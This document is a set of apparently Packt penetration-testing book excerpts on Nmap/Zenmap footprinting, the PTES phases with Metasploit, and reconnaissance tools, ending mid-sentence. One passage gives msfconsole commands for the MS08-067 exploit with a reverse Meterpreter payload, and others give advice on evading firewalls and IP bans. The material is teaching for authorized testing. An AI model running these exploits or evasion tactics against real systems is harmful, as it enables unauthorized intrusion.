In this article by Wolf Halton and Bo Weaver, the authors of the book Kali Linux 2: Windows Penetration Testing, we try to debunk the myth that all Windows systems are easy to exploit. This is not entirely true. Almost any Windows system can be hardened to the point that it takes too long to exploit its vulnerabilities. In this article, you will learn the following: How to footprint your Windows network and discover the vulnerabilities before the bad guys do Ways to investigate and map your Windows network to find the Windows systems that are susceptible to exploits (For more resources related to this topic, see here.) In some cases, this will be adding to your knowledge of the top 10 security tools, and in others, we will show you entirely new tools to handle this category of investigation. Footprinting the network You can't find your way without a good map. In this article, we are going to learn how to gather network information and assess the vulnerabilities on the network. In the Hacker world this is called Footprinting. This is the first step to any righteous hack. This is where you will save yourself time and massive headaches. Without Footprinting your targets, you are just shooting in the dark. The biggest tool in any good pen tester's toolbox is Mindset. You have to have the mind of a sniper. You learn your targets habits and its actions. You learn the traffic flows on the network where your target lives. You find the weaknesses in your target and then attack those weaknesses. Search and destroy! In order to do good Footprinting, you have to use several tools that come with Kali. Each tool has it strong points and looks at the target from a different angle. The more views you have of your target, the better plan of attack you have. Footprinting will differ depending on whether your targets are external on the public network, or internal and on a LAN. We will be covering both aspects. Please read the paragraph above again, and remember you do not have our permission to attack these machines. Don't do the crime if you can't do the time. Exploring the network with Nmap You can't talk about networking without talking about Nmap. Nmap is the Swiss Army knife for network administrators. It is not only a great Footprinting tool, but also the best and cheapest network analysis tool any sysadmin can get. It's a great tool for checking a single server to make sure the ports are operating properly. It can heartbeat and ping an entire network segment. It can even discover machines when ICMP (ping) has been turned off. It can be used to pressure-test services. If the machine freezes under the load, it needs repairs. Nmap was created in 1997 by Gordon Lyon, who goes by the handle Fyodor on the Internet. Fyodor still maintains Nmap and it can be downloaded from http://insecure.org. You can also order his book Nmap Network Scanning on that website. It is a great book, well worth the price! Fyodor and the Nmap hackers have collected a great deal of information and security e-mail lists on their site. Since you have Kali Linux, you have a full copy of Nmap already installed! Here is an example of Nmap running against a Kali Linux instance. Open the terminal from the icon on the top bar or by clicking on the menu link Application | Accessories | Terminal. You could also choose the Root Terminal if you want, but since you are already logged in as Root, you will not see any differences in how the terminal emulator behaves. 
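As a quick reference, the commands used in the following walkthrough can be gathered in one place. This is just a sketch: the IP address 10.0.0.4 is a placeholder for whichever machine you are testing, and the Apache init script path is the one used on this Kali build.

# Aggressive scan of a single host: OS detection, version detection, default scripts, and traceroute
nmap -A 10.0.0.4

# Start Kali's bundled Apache web server so that the next scan has an open port to report on
/etc/init.d/apache2 start

# Scan again and compare the two sets of results
nmap -A 10.0.0.4

The same commands work unchanged from a root shell, or with sudo prefixed when running as a non-root user.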
Type nmap -A 10.0.0.4 at the command prompt (you need to put in the IP of the machine you are testing). The output shows the open ports among 1000 commonly used ports. Kali Linux, by default, has no running network services, and so in this run you will see a readout showing no open ports. To make it a little more interesting, start the built-in webserver by typing /etc/init.d/apache2 start. With the web server started, run the Nmap command again: nmap -A 10.0.0.4 As you can see, Nmap is attempting to discover the operating system (OS) and to tell which version of the web server is running: Here is an example of running Nmap from the Git Bash application, which lets you run Linux commands on your Windows desktop. This view shows a neat feature of Nmap. If you get bored or anxious and think the system is taking too much time to scan, you can hit the down arrow key and it will print out a status line to tell you what percentage of the scan is complete. This is not the same as telling you how much time is left on the scan, but it does give you an idea what has been done: Zenmap Nmap comes with a GUI frontend called Zenmap. Zenmap is a friendly graphic interface for the Nmap application. You will find Zenmap under Applications | Information Gathering | Zenmap. Like many Windows engineers, you may like Zenmap more than Nmap: Here we see a list of the most common scans in a drop-down box. One of the cool features of Zenmap is when you set up a scan using the buttons, the application also writes out the command-line version of the command, which will help you learn the command-line flags used when using Nmap in command-line mode. Hacker tip Most hackers are very comfortable with the Linux Command Line Interface (CLI). You want to learn the Nmap commands on the command line because you can use Nmap inside automated Bash scripts and make up cron jobs to make routine scans much simpler. You can set a cron job to run the test in non-peak hours, when the network is quieter, and your tests will have less impact on the network's legitimate users. The choice of intense scan produces a command line of nmap -T4 -A -v. This produces a fast scan. The T stands for Timing (from 1 to 5), and the default timing is -T3. The faster the timing, the rougher the test, and the more likely you are to be detected if the network is running an Intrusion Detection System (IDS). The -A stands for All, so this single option gets you a deep port scan, including OS identification, and attempts to find the applications listening on the ports, and the versions of those applications.  Finally, the -v stands for verbose. -vv means very verbose: Summary In this article, we learned about penetration testing in a Windows environment. Contrary to popular belief, Windows is not riddled with wide-open security holes ready for attackers to find. We learned how to use nmap to obtain detailed statistics about the network, making it an indispensible tool in our pen testing kit. Then, we looked at Zenmap, which is a GUI frontend for nmap and makes it easy for us to view the network. Think of nmap as flight control using audio transmissions and Zenmap as a big green radar screen—that's how much easier it makes our work. Resources for Article: Further resources on this subject: Bringing DevOps to Network Operations [article] Installing Magento [article] Zabbix Configuration [article]

Approaching a Penetration Test Using Metasploit

Packt
26 Sep 2016
17 min read
"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert In this article by Nipun Jaswal, authors of Mastering Metasploit, Second Edition, we will discuss penetration testing, which is an intentional attack on a computer-based system with the intension of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization if it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization. (For more resources related to this topic, see here.) Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more. This article has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This article assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this article will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram: This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article. In this article, you will learn about the following topics: The phases of a penetration test The basics of the Metasploit framework The workings of exploits Testing a target network with Metasploit The benefits of using databases An important point to take a note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test. When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test: Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test. Organizing a penetration test Before we start firing sophisticated and complex attack vectors with Metasploit, we must get ourselves comfortable with the work environment. 
Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale. Preinteractions The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points: Scope: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, the time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope. A general scope document provides answers to the following questions: What are the target organization's biggest security concerns? What specific hosts, network address ranges, or applications should be tested? What specific hosts, network address ranges, or applications should explicitly NOT be tested? Are there any third parties that own systems or networks that are in the scope, and which systems do they own (written permission must have been obtained in advance by the target organization)? Will the test be performed against a live production environment or a test environment? Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering? Will the penetration test include internal network testing? If so, how will access be obtained? Are client/end-user systems included in the scope? If so, how many clients will be leveraged? Is social engineering allowed? If so, how may it be used? Are Denial of Service attacks allowed? Are dangerous checks/exploits allowed? Goals: This section discusses various primary and secondary goals that a penetration test is set to achieve. The common questions related to the goals are as follows: What is the business requirement for this penetration test? This is required by a regulatory audit or standard Proactive internal decision to determine all weaknesses What are the objectives? 
Map out vulnerabilities Demonstrate that the vulnerabilities exist Test the incident response Actual exploitation of a vulnerability in a network, system, or application All of the above Testing terms and definitions: This section discusses basic terminologies with the client and helps him or her understand the terms well Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows: At what time do you want these tests to be performed? During business hours After business hours Weekend hours During a system maintenance window Will this testing be done on a production environment? If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test? Who is the technical point of contact? For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png. Intelligence gathering / reconnaissance phase In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach. The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to stimulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save a large amount of time as well. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is foot printed. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports and to decide which services are vulnerable and how to make use of them to enter the desired system. The procedures followed during this phase are required to identify the security policies that are currently set in place at the target, and what we can do to breach them. Let us discuss this using an example. Consider a black box test against a web server where the client wants to perform a network stress test. Here, we will be testing a server to check what level of bandwidth and resource stress the server can bear or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. In order to achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. 
Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of protection mechanism set by the server administrator that sensed our malicious intent of taking the server down, and hence resulting in a ban of our IP address. Therefore, we must collect correct information and identify various security services at the target before launching an attack. The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. A proper validation of the attack vectors is mandatory because if we do not validate the attack vectors prior to the attack, it may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client for white listing IP addresses used for testing. Now let us look at the second example. Consider a black box test against a windows 2012 server. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running while on port 8080, we discover that the vulnerable version of the Rejetto HFS Server is running, which is prone to the Remote Code Execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This might be a common scenario where inbound malicious traffic is blocked by the firewall. In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. This may prove to be more successful as firewalls are commonly being configured to inspect ingress traffic rather than egress traffic. Coming back to the procedures involved in the intelligence-gathering phase when viewed as a process are as follows: Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack. Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. In addition, it covers off-site gathering that involves data warehouse identification; this phase is generally considered during a white box penetration test. Foot printing: This involves active or passive scans to identify various technologies used at the target, which includes port scanning, banner grabbing, and so on. Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on. For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering Predicting the test grounds A regular occurrence during penetration testers' lives is when they start testing an environment, they know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave the rest of the options. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. 
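To make this concrete, a minimal msfconsole sketch for that NETAPI (MS08-067) exploit might look like the following. The module path is the standard Metasploit one, but the IP addresses are placeholders for a lab target and attacker machine, and depending on the framework version the target option is named RHOST or RHOSTS:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.4.20
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.4.10
exploit

A successful run drops you into a Meterpreter session on the target; as always, only point this at machines you are explicitly authorized to test.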
Suppose a penetration tester needs to visit an organization, and before going there, they learn that 90 percent of the machines in the organization are running on Windows XP, and some of them use Windows 2000 Server. The tester quickly decides that they will be using the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 server from Metasploit to complete the testing phase successfully. However, we will also see how we can use these exploits practically in the latter section of this article. Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and IIS testing tools, therefore ignoring the exploits and tools for Linux. Hence, predicting the environment under a test helps to build the strategy of the test that we need to follow at the client's site. For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067. For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/Windows /dcerpc/ms03_026_dcom. Modeling threats In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling out correct threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions: How can we attack a particular network? To which crucial sections do we need to gain access? What approach is best suited for the attack? What are the highest-rated threats? Modeling threats will help a penetration tester to perform the following set of operations: Gather relevant documentation about high-level threats Identify an organization's assets on a categorical basis Identify and categorize threats Mapping threats to the assets of an organization Modeling threats will help to define the highest priority assets with threats that can influence these assets. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Mapping a SQL injection attack to primary and secondary assets is achievable during this phase. Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using the automated approach. This can prove to be handy while conducting large tests. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling. Vulnerability analysis Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to web application, an insecure application design for vulnerable database services, and a VOIP-based server to SCADA-based services. This phase generally contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. 
Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validation. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence. For more information on the processes involved during the vulnerability analysis phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis. Exploitation and post-exploitation The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered the actual attack phase. In this phase, a penetration tester fires exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase follows exploitation. This phase covers the various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on. For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post-exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation. Reporting Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article. For more information on the processes involved during the reporting phase, refer to http://www.pentest-standard.org/index.php/Reporting. Mounting the environment Before going to war, soldiers must make sure that their artillery is working perfectly. This is exactly the approach we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions: How well is your test lab configured? Are all the required tools for testing available? Is your hardware good enough to support such tools? Before we begin to test anything, we must make sure that all the required tools are available and that everything works perfectly. Summary Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how we can set up Metasploit and conduct a black box test on the network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012. We also looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following: Knowledge of the phases of a penetration test The benefits of using databases in Metasploit The basics of the Metasploit framework Knowledge of the workings of exploits and auxiliary modules Knowledge of the approach to penetration testing with Metasploit The primary goal of this article was to inform you about penetration test phases and Metasploit. Next, we will dive into the coding part of Metasploit and write our own custom functionality for the Metasploit framework. Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Open Source Intelligence [article] Ruby and Metasploit Modules [article]

Introducing Penetration Testing

Packt
07 Sep 2016
28 min read
In this article by Kevin Cardwell, the author of the book Building Virtual Pentesting Labs for Advanced Penetration Testing, we will discuss the role that pen testing plays in the professional security testing framework. We will discuss the following topics: Defining security testing An abstract security testing methodology Myths and misconceptions about pen testing (For more resources related to this topic, see here.) If you have been doing penetration testing for some time and are very familiar with the methodology and concept of professional security testing, you can skip this article or just skim it. But you might learn something new or at least a different approach to penetration testing. We will establish some fundamental concepts in this article. Security testing If you ask 10 consultants to define what security testing is today, you will more than likely get a variety of responses. Here is the Wikipedia definition: "Security testing is a process and methodology to determine that an information system protects and maintains functionality as intended." In my opinion, this is the most important aspect of penetration testing. Security is a process and not a product. I'd also like to add that it is a methodology and not a product. Another component to add to our discussion is the point that security testing takes into account the main areas of a security model. A sample of this is as follows: Authentication Authorization Confidentiality Integrity Availability Non-repudiation Each one of these components has to be considered when an organization is in the process of securing their environment. Each one of these areas in itself has many subareas that also have to be considered when it comes to building a secure architecture. The lesson is that when testing security, we have to address each of these areas. Authentication It is important to note that almost all systems and/or networks today have some form of authentication and, as such, it is usually the first area we secure. This could be something as simple as users selecting a complex password or us adding additional factors to authentication, such as a token, biometrics, or certificates. No single factor of authentication is considered to be secure by itself in today's networks. Authorization Authorization is often overlooked since it is assumed and not a component of some security models. That is one approach to take, but it's preferred to include it in most testing models, as the concept of authorization is essential since it is how we assign the rights and permissions to access a resource, and we would want to ensure it is secure. Authorization enables us to have different types of users with separate privilege levels coexist within a system. We do this when we have the concept of discretionary access, where a user can have administrator privileges on a machine or assume the role of an administrator to gain additional rights or permissions, whereas we might want to provide limited resource access to a contractor. Confidentiality Confidentiality is the assurance that something we want to be protected on the machine or network is safe and not at risk of being compromised. This is made harder by the fact that the protocol (TCP/IP) running the Internet today is a protocol that was developed in the early 1970s. At that time, the Internet consisted of just a few computers, and now, even though the Internet has grown to the size it is today, we are still running the same protocol from those early days. 
This makes it more difficult to preserve confidentiality. It is important to note that when the developers created the protocol and the network was very small, there was an inherent sense of trust on who you could potentially be communicating with. This sense of trust is what we continue to fight from a security standpoint today. The concept from that early creation was and still is that you can trust data received to be from a reliable source. We know now that the Internet is at this huge size and that is definitely not the case. Integrity Integrity is similar to confidentiality, in that we are concerned with the compromising of information. Here, we are concerned with the accuracy of data and the fact that it is not modified in transit or from its original form. A common way of doing this is to use a hashing algorithm to validate that the file is unaltered. Availability One of the most difficult things to secure is availability, that is, the right to have a service when required. The irony of availability is that a particular resource is available to one user, and it is later available to all. Everything seems perfect from the perspective of an honest/legitimate user. However, not all users are honest/legitimate, and due to the sheer fact that resources are finite, they can be flooded or exhausted; hence, is it is more difficult to protect this area. Non-repudiation Non-repudiation makes the claim that a sender cannot deny sending something after the fact. This is the one I usually have the most trouble with, because a computer system can be compromised and we cannot guarantee that, within the software application, the keys we are using for the validation are actually the ones being used. Furthermore, the art of spoofing is not a new concept. With these facts in our minds, the claim that we can guarantee the origin of a transmission by a particular person from a particular computer is not entirely accurate. Since we do not know the state of the machine with respect to its secureness, it would be very difficult to prove this concept in a court of law. All it takes is one compromised machine, and then the theory that you can guarantee the sender goes out the window. We won't cover each of the components of security testing in detail here, because that is beyond the scope of what we are trying to achieve. The point I want to get across in this article is that security testing is the concept of looking at each and every one of these and other components of security, addressing them by determining the amount of risk an organization has from them, and then mitigating that risk. An abstract testing methodology As mentioned previously, we concentrate on a process and apply that to our security components when we go about security testing. For this, I'll describe an abstract methodology here. We will define our testing methodology as consisting of the following steps: Planning Nonintrusive target search Intrusive target search Data analysis Reporting Planning Planning is a crucial step of professional testing. But, unfortunately, it is one of the steps that is rarely given the time that is essentially required. There are a number of reasons for this, but the most common one is the budget: clients do not want to provide consultants days and days to plan their testing. In fact, planning is usually given a very small portion of the time in the contract due to this reason. Another important point about planning is that a potential adversary is going to spend a lot of time on it. 
There are two things we should tell clients with respect to this step that as a professional tester we cannot do but an attacker could: 6 to 9 months of planning: The reality is that a hacker who targets someone is going to spend a lot of time before the actual attack. We cannot expect our clients to pay us for 6 to 9 months of work just to search around and read on the Internet. Break the law: We could break the law and go to jail, but it is not something that is appealing for most. Additionally, being a certified hacker and licensed penetration tester, you are bound to an oath of ethics, and you can be pretty sure that breaking the law while testing is a violation of this code of ethics. Nonintrusive target search There are many names that you will hear for nonintrusive target search. Some of these are open source intelligence, public information search, and cyber intelligence. Regardless of which name you use, they all come down to the same thing: using public resources to extract information about the target or company you are researching. There is a plethora of tools that are available for this. We will briefly discuss those tools to get an idea of the concept, and those who are not familiar with them can try them out on their own. Nslookup The nslookup tool can be found as a standard program in the majority of the operating systems we encounter. It is a method of querying DNS servers to determine information about a potential target. It is very simple to use and provides a great deal of information. Open a command prompt on your machine, and enter nslookup www.packtpub.com. This will result in output like the following screenshot:  As you can see, the response to our command is the IP address of the DNS server for the www.packtpub.com domain. If we were testing this site, we would have explored this further. Alternatively, we may also use another great DNS-lookup tool called dig. For now, we will leave it alone and move to the next resource. Central Ops The https://centralops.net/co/ website has a number of tools that we can use to gather information about a potential target. There are tools for IP, domains, name servers, e-mail, and so on. The landing page for the site is shown in the next screenshot: The first thing we will look at in the tool is the ability to extract information from a web server header page: click on TcpQuery, and in the window that opens, enter www.packtpub.com and click on Go. An example of the output from this is shown in the following screenshot: As the screenshot shows, the web server banner has been modified and says packt. If we do the query against the www.packtpub.com domain we have determined that the site is using the Apache web server, and the version that is running; however we have much more work to do in order to gather enough information to target this site. The next thing we will look at is the capability to review the domain server information. This is accomplished by using the domain dossier. Return to the main page, and in the Domain Dossier dialog box, enter yahoo.com and click on go. An example of the output from this is shown in the following screenshot:  There are many tools we could look at, but again, we just want to briefly acquaint ourselves with tools for each area of our security testing procedure. 
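The article shows a plain nslookup; if you prefer to stay at the command line for this whole step, a few variations using nslookup record-type queries and the dig tool mentioned above look like the following sketch. Here packtpub.com is simply the example domain, and the flags shown are the standard ones on most Linux distributions and on Kali:

# Look up specific record types with nslookup
nslookup -type=MX packtpub.com
nslookup -type=NS packtpub.com

# dig equivalents, trimmed to just the answers
dig +short www.packtpub.com A
dig +short packtpub.com MX
dig +short packtpub.com NS

The mail exchanger and name server records often point to hosting providers and other third parties, which widens the picture of the target's infrastructure.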
If you are using Windows and you open a command prompt window and enter tracert www.microsoft.com, you will observe that it fails, as indicated in this screenshot:  The majority of you reading this article probably know why this is blocked; for those of you who do not, it is because Microsoft has blocked the ICMP protocol, which is what the tracert command uses by default. It is simple to get past this because the server is running services; we can use those protocols to reach it, and in this case, that protocol is TCP. If you go to http://www.websitepulse.com/help/testtools.tcptraceroute-test.html and enter www.microsoft.com in the IP address/domain field with the default location and conduct the TCP Traceroute test, you will see it will now be successful, as shown in the following screenshot: As you can see, we now have additional information about the path to the potential target; moreover, we have additional machines to add to our target database as we conduct our test within the limits of the rules of engagement. The Wayback Machine The Wayback Machine is proof that nothing that has ever been on the Internet leaves! There have been many assessments in which a client informed the team that they were testing a web server that hadn't placed into production, and when they were shown the site had already been copied and stored, they were amazed that this actually does happen. I like to use the site to download some of my favorite presentations, tools, and so on, that have been removed from a site or, in some cases, whose site no longer exists. As an example, one of the tools used to show students the concept of steganography is the tool infostego. This tool was released by Antiy Labs, and it provided students an easy-to-use tool to understand the concepts. Well, if you go to their site at http://www.antiy.net/, you will find no mention of the tool—in fact, it will not be found on any of their pages. They now concentrate more on the antivirus market. A portion from their page is shown in the following screenshot: Now, let's try and use the power of the Wayback Machine to find our software. Open the browser of your choice and go to www.archive.org. The Wayback Machine is hosted there and can be seen in the following screenshot: As indicated, there are 491 billion pages archived at the time of writing this article. In the URL section, enter www.antiy.net and hit Enter. This will result in the site searching its archives for the entered URL. After a few moments, the results of the search will be displayed. An example of this is shown in the following screenshot: We know we don't want to access a page that has been recently archived, so to be safe, click on 2008. This will result in the calendar being displayed and showing all the dates in 2008 on which the site was archived. You can select any one that you want; an example of the archived site from December 18 is shown in the following screenshot: as you can see, the infostego tool is available, and you can even download it! Feel free to download and experiment with the tool if you like. Shodan The Shodan site is one of the most powerful cloud scanners available. You are required to register with the site to be able to perform the more advanced types of queries. To access the site, go to https://www.shodan.io/. It is highly recommended that you register, since the power of the scanner and the information you can discover is quite impressive, especially after registration. 
The page that is presented once you log in is shown in the following screenshot: The screenshot shows recently shared search queries as well as the most recent searches the logged-in user has conducted. This is another tool you should explore deeply if you do professional security testing. For now, we will look at one example and move on, since an entire article could be written just on this tool. If you are logged in as a registered user, you can enter iphone us into the search query window. This will return pages with iphone in the query and mostly in the United States, but as with any tool, there will be some hits on other sites as well. An example of the results of this search is shown in the following screenshot: Intrusive target search This is the step that starts the true hacker-type activity. This is when you probe and explore the target network; consequently, ensure that you have explicit written permission with you to carry out this activity. Never perform an intrusive target search without permission, as this written authorization is the only thing that differentiates you from a malicious hacker. Without it, you are considered a criminal like them. Within this step, there are a number of components that further define the methodology. Find live systems No matter how good our skills are, we need to find systems that we can attack. This is accomplished by probing the network and looking for a response. One of the most popular tools to do this with is the excellent open source tool nmap, written by Fyodor. You can download nmap from https://nmap.org/, or you can use any number of toolkit distributions for the tool. We will use the exceptional penetration-testing framework Kali Linux. You can download the distribution from https://www.kali.org/. Regardless of which version of nmap you explore with, they all have similar, if not the same, command syntax. In a terminal window, or a command prompt window if you are running it on Windows, type nmap -sP <insert network IP address>. The network we are scanning is the 192.168.4.0/24 network; yours more than likely will be different. An example of this ping sweep command is shown in the following screenshot: We now have live systems on the network that we can investigate further. For those of you who would like a GUI tool, you can use Zenmap. Discover open ports Now that we have live systems, we want to see what is open on these machines. A good analogy for a port is a door: if the door is open, I can approach it. There might be things that I have to do once I get to the door to gain access, but if it is open, then I know it is possible to get access, and if it is closed, then I know I cannot go through that door. Furthermore, we might need to know the type of lock that is on the door, because it might have weaknesses or additional protection that we need to know about. The same is true of ports: if they are closed, then we cannot go into that machine using that port. We have a number of ways to check for open ports, and we will continue with the same theme and use nmap. We have machines that we have identified, so we do not have to scan the entire network as we did previously—we will only scan the machines that are up. Additionally, one of the machines found is our own machine; therefore, we will not scan ourselves—we could, but it's not the best plan. The targets that are live on our network are 1, 2, 16, and 18. We can scan these by entering nmap -sS 192.168.4.1,2,16,18. 
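Because the ping sweep feeds the port scan, the two steps can also be chained in a small shell sketch. This is an illustration rather than part of the original walkthrough: the 192.168.4.0/24 range is the lab network used above, -oG writes nmap's grepable output so that the live hosts are easy to extract, and the SYN scan needs root privileges.

# Ping sweep of the lab network, saving grepable output
nmap -sP -oG discovery.gnmap 192.168.4.0/24

# Pull out the addresses that responded
awk '/Up$/ {print $2}' discovery.gnmap > live_hosts.txt

# Stealth (SYN) scan of only the hosts that are up
nmap -sS -iL live_hosts.txt -oN portscan.txt

Scanning from a file of live hosts keeps the port scan focused and avoids wasting time on addresses that never answered.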
Those of you who want to learn more about the different types of scans can refer to http://nmap.org/book/man-port-scanning-techniques.html. Alternatively, you can use the nmap –h option to display a list of options. The first portion of the stealth scan (not completing the three-way handshake) result is shown in the following screenshot:   Discover services We now have live systems and openings that are on the machine. The next step is to determine what, if anything, is running on the ports we have discovered—it is imperative that we identify what is running on the machine so that we can use it as we progress deeper into our methodology. We once again turn to nmap. In most command and terminal windows, there is history available; hopefully, this is the case for you and you can browse through it with the up and down arrow keys on your keyboard. For our network, we will enter nmap –sV 192.168.4.1. From our previous scan, we've determined that the other machines have all scanned ports closed, so to save time, we won't scan them again. An example of this is shown in the following screenshot: From the results, you can now see that we have additional information about the ports that are open on the target. We could use this information to search the Internet using some of the tools we covered earlier, or we could let a tool do it for us. Enumeration Enumeration is the process of extracting more information about the potential target to include the OS, usernames, machine names, and other details that we can discover. The latest release of nmap has a scripting engine that will attempt to discover a number of details and in fact enumerate the system to some aspect. To process the enumeration with nmap, use the -A option. Enter nmap -A 192.168.4.1. Remember that you will have to enter your respective target address, which might be different from the one mentioned here. Also, this scan will take some time to complete and will generate a lot of traffic on the network. If you want an update, you can receive one at any time by pressing the spacebar. This command's output is quite extensive; so a truncated version is shown in the following screenshot:   As you can see, you have a great deal of information about the target, and you are quite ready to start the next phase of testing. Additionally, we have the OS correctly identified; until this step, we did not have that. Identify vulnerabilities After we have processed the steps up to this point, we have information about the services and versions of the software that are running on the machine. We could take each version and search the Internet for vulnerabilities, or we could use a tool—for our purposes, we will choose the latter. There are numerous vulnerability scanners out there in the market, and the one you select is largely a matter of personal preference. The commercial tools for the most part have a lot more information and details than the free and open source ones, so you will have to experiment and see which one you prefer. We will be using the Nexpose vulnerability scanner from Rapid7. There is a community version of their tool that will scan a limited number of targets, but it is worth looking into. You can download Nexpose from 